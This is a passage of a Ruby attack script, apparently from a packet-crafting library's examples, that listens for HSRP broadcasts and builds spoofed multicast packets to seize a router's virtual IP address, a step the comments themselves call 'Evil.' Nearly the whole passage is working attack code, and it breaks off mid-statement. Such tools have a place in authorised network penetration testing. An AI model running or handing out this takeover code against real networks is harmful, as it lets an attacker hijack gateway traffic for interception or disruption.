#!/usr/bin/env ruby # # $Id: hsrp_takeover 9 2008-03-02 04:44:32Z warchild $ # # # Listen for HSRP broadcasts and use the information learned # therein to perform an active "takeover" of that VIP. Evil. # # Jon Hart require 'rubygems' require 'pcaprub' require 'racket' if (ARGV.size < 1) puts "Usage: $0 [new router]" exit end iface = ARGV[0] router = ARGV[1] begin p = Pcap::open_live(iface, 1500, true, 1000) unless (iface.nil?) p.setfilter("! host #{router}") end rescue Exception => e puts "Pcap: Cannot open device #{ARGV[0]}: #{e}" exit end # prep our new takeover. takeover = Racket.new takeover.l3 = IPv4.new takeover.l3.src_ip = router takeover.l3.dst_ip = "224.0.0.2" takeover.l3.protocol = 17 takeover.l4 = UDP.new ta